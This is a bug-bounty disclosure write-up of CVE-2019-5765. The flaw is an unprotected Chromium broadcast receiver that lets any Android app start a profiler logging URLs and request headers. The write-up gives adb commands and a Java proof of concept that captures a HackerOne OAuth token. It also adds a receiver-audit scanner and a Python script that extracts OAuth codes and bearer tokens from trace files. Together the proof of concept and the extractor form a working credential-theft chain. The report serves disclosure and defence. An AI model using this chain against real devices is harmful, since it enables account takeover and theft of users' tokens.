CVE-2019-5765: 1-click HackerOne account takeover on all Android devices
Discovered by bagipro on Chromium

Time to triage: no information. Time to resolve once triaged: 1 day and 0 hours.



Hi, this is a story about a technically very simple bug that allowed dumping browsing history (URLs and request headers) from all Chromium embedders (Chromium-based browsers and apps using WebView). It was disclosed yesterday by the Chromium team, which is why I can now publish the details.

In December 2018, while participating in the Samsung bug bounty program and looking for bugs in Samsung Browser, I unexpectedly found a bug in the Chromium Android core. I discovered a publicly registered broadcast receiver (there are actually tons of them in apps in HackerOne's scope, but I don't disclose them due to low impact) in the file https://github.com/chromium/chromium/blob/2d57e5b/content/public/android/java/src/org/chromium/content/browser/TracingControllerAndroidImpl.java#L300. It activated a profiler (a logger of all requests) when it received a broadcast with the action `%app_package%.GPU_PROFILER_START`. Then I tried to reproduce it in the Chrome browser, and it worked:

1. Sent a broadcast from ADB: `adb shell am broadcast -a com.android.chrome.GPU_PROFILER_START`
2. Loaded a page in Chrome
3. Stopped the profiler: `adb shell am broadcast -a com.android.chrome.GPU_PROFILER_STOP`

I expected to see a useless `.hprof` file, but when I opened it I found all URLs and request headers (except cookies) logged there. Then I tried the same thing with the PayPal app, and the bug worked there too. It turned out that the profiler receiver was registered automatically in every app embedding Chromium.
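The root cause described above is a receiver registered at runtime with no broadcast permission, so any app on the device can trigger it. The following scanner is an added example written for this page (it is not Chromium's code and not part of the original report): it walks Java source for `registerReceiver(` calls and classifies each one as open to every app, protected by the `broadcastPermission` argument of the four-argument overload, or registered with the `RECEIVER_NOT_EXPORTED` flag available since API 33. The sample source it runs on is constructed; the textual heuristic does not resolve overloads or follow variables, so hits are leads for review rather than confirmed findings.

```python
"""Flag runtime registerReceiver() calls that leave a receiver open to every app.

Added example, not part of the original report or of Chromium. A receiver
registered through Context.registerReceiver() with neither a broadcastPermission
argument nor the RECEIVER_NOT_EXPORTED flag (API 33+) accepts intents from any
app on the device, which is the pattern behind this report.
"""
import re

CALL_RE = re.compile(r"\bregisterReceiver\s*\(")


def split_call_args(src, open_paren):
    """Return the top-level argument strings of the call whose '(' sits at src[open_paren]."""
    depth, args, current = 0, [], []
    for i in range(open_paren, len(src)):
        ch = src[i]
        if ch == "(":
            depth += 1
            if depth == 1:
                continue  # the call's own opening parenthesis
        elif ch == ")":
            depth -= 1
            if depth == 0:
                args.append("".join(current).strip())
                return [a for a in args if a]
        elif ch == "," and depth == 1:
            args.append("".join(current).strip())
            current = []
            continue
        current.append(ch)
    raise ValueError("unbalanced parentheses in registerReceiver call")


def classify(args):
    """Map an argument list to 'not-exported', 'permission-protected' or 'open-to-all-apps'."""
    if any("RECEIVER_NOT_EXPORTED" in a for a in args):
        return "not-exported"
    if len(args) >= 3:
        third = args[2]
        # The third argument is either a permission String (4/5-arg overloads) or an
        # int flags value (registerReceiver(receiver, filter, int flags), API 26+).
        looks_like_flags = third.isdigit() or "RECEIVER_" in third
        if third != "null" and not looks_like_flags:
            return "permission-protected"
    return "open-to-all-apps"


def audit_receivers(java_src):
    """Return one finding per registerReceiver() call: line number, args, classification."""
    findings = []
    for match in CALL_RE.finditer(java_src):
        args = split_call_args(java_src, match.end() - 1)
        findings.append({
            "line": java_src.count("\n", 0, match.start()) + 1,
            "args": args,
            "status": classify(args),
        })
    return findings


# Constructed sample (not Chromium's source): the first call mirrors the pattern
# in this report, the other two show the protected forms.
SAMPLE_JAVA = """
public class TracingController {
    void register(Context ctx, BroadcastReceiver r) {
        IntentFilter f = new IntentFilter(ctx.getPackageName() + ".GPU_PROFILER_START");
        ctx.registerReceiver(r, f);
    }
    void registerProtected(Context ctx, BroadcastReceiver r, IntentFilter f) {
        ctx.registerReceiver(r, f, ctx.getPackageName() + ".permission.TRACE", null);
    }
    void registerLocal(Context ctx, BroadcastReceiver r, IntentFilter f) {
        ctx.registerReceiver(r, f, Context.RECEIVER_NOT_EXPORTED);
    }
}
"""

if __name__ == "__main__":
    for finding in audit_receivers(SAMPLE_JAVA):
        print(f"line {finding['line']}: {finding['status']}  args={finding['args']}")
```

Run it over a checkout with `python3 audit.py` after pointing `SAMPLE_JAVA` at real files; a call that ends up as `open-to-all-apps` with an action any app can guess (the `%app_package%.GPU_PROFILER_START` form in this report) is exactly what an Instant App or any other installed app could fire.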

Since HackerOne uses OAuth for authorization, its users could be attacked too. I think the attack complexity was pretty low using Android Instant Apps, which are enabled by default on recent Android versions (to observe the behavior, just google `vimeo video` and click a video: the Vimeo app launches automatically even if it isn't installed on your device).

PoC to abuse a HackerOne account (runs inside an Activity, since `sendBroadcast` and `startActivity` are Context methods):

```java
import android.content.Intent;
import android.net.Uri;
import android.os.Handler;

// activates the profiler in Chrome browser
sendBroadcast(new Intent("com.android.chrome.GPU_PROFILER_START"));

// opens a page in Chrome, logs will be written automatically
startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse("https://hackerone.com/hacker_dashboard/my_programs")));

// stops the profiler, delay is 2s to let the page load
new Handler().postDelayed(() -> sendBroadcast(new Intent("com.android.chrome.GPU_PROFILER_STOP")), 2000);
```

Now you can read the log file (by default it is written to `/sdcard/`, but you can control the output path by supplying the `file` extra, `-e file /any/path` from adb) and steal the leaked HackerOne token:

[Attachment h1_token.png: screenshot of the trace file showing the leaked HackerOne token]
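The last step, reading the trace and picking the token out of it, is what the attacker automates. The script below is an added example written for this page (not the reporter's code): it loads a Chrome JSON trace, walks every string nested under each event's `args` object, and reports URLs, request headers, and anything that looks like credential material (OAuth `code`/`state`/`token` query parameters, `Authorization`-style headers). The exact event and key names Chrome uses are an assumption, which is why the walk is generic rather than keyed on field names; the sample trace embedded at the bottom is constructed, not a real capture.

```python
"""Extract URLs, request headers and likely secrets from a Chrome JSON trace file.

Added example, not part of the original report. The event layout is an
assumption: Chrome writes {"traceEvents": [...]} where each event carries an
"args" object and the URL / header fields live somewhere inside it, so every
string nested under "args" is inspected instead of relying on exact key names.
"""
import json
import re
import sys
from urllib.parse import parse_qsl, urlsplit

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Query parameters that commonly carry OAuth / session material (assumed list).
SENSITIVE_PARAMS = {"token", "access_token", "id_token", "code", "state", "session", "auth", "key"}
# Header names that commonly carry credentials (assumed list).
SENSITIVE_HEADERS = {"authorization", "x-csrf-token", "x-auth-token"}


def iter_strings(node, path=()):
    """Yield (path, value) for every string nested anywhere inside a JSON value."""
    if isinstance(node, str):
        yield path, node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield from iter_strings(value, path + (key,))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from iter_strings(value, path + (index,))


def load_trace_events(text):
    """Accept both the object form {"traceEvents": [...]} and a bare event array."""
    data = json.loads(text)
    return data["traceEvents"] if isinstance(data, dict) else data


def extract(trace_text):
    """Return {"urls": [...], "headers": [(name, value)], "secrets": [dict]}."""
    found = {"urls": [], "headers": [], "secrets": []}
    for event in load_trace_events(trace_text):
        for path, text in iter_strings(event.get("args", {})):
            keys = [p for p in path if isinstance(p, str)]
            if any("header" in k.lower() for k in keys):
                # Header blocks appear either as {"Name": "value"} or ["Name: value", ...].
                if isinstance(path[-1], int) and ": " in text:
                    name, value = text.split(": ", 1)
                else:
                    name, value = str(path[-1]), text
                found["headers"].append((name, value))
                if name.lower() in SENSITIVE_HEADERS:
                    found["secrets"].append({"kind": "header", "name": name, "value": value})
                continue
            for url in URL_RE.findall(text):
                found["urls"].append(url)
                for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
                    if key.lower() in SENSITIVE_PARAMS:
                        found["secrets"].append({"kind": "query", "name": key, "value": value, "url": url})
    return found


# Constructed sample trace (not a real capture): two requests, one carrying an
# OAuth code in the URL and a bearer token in a header, plus a metadata event.
SAMPLE_TRACE = json.dumps({"traceEvents": [
    {"name": "ResourceSendRequest", "cat": "devtools.timeline", "ph": "I", "ts": 1,
     "args": {"data": {"url": "https://hackerone.com/hacker_dashboard/my_programs",
                       "requestMethod": "GET",
                       "requestHeaders": {"Accept": "text/html",
                                          "User-Agent": "Mozilla/5.0 (Linux; Android 9)"}}}},
    {"name": "ResourceSendRequest", "cat": "devtools.timeline", "ph": "I", "ts": 2,
     "args": {"data": {"url": "https://api.example.test/oauth/callback?code=abc123&state=xyz",
                       "requestMethod": "GET",
                       "requestHeaders": ["Authorization: Bearer constructed.token.value",
                                          "Accept: application/json"]}}},
    {"name": "thread_name", "ph": "M", "args": {"name": "CrBrowserMain"}},
]})

if __name__ == "__main__":
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_TRACE
    result = extract(source)
    for url in result["urls"]:
        print("URL   ", url)
    for finding in result["secrets"]:
        print("SECRET", finding["kind"], finding["name"], "=", finding["value"])
```

Point it at the file the profiler wrote (`python3 trace_secrets.py /sdcard/chrome-profile-results-*`) and the `SECRET` lines are the OAuth codes and bearer tokens that were in flight while tracing was on; because cookies are not logged, the query-string material is usually what makes the capture exploitable.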

Links:

- https://www.wired.com/story/android-vulnerability-five-years-fragmentation/
- https://www.theregister.co.uk/2019/03/20/google_android_browser_vulnerability/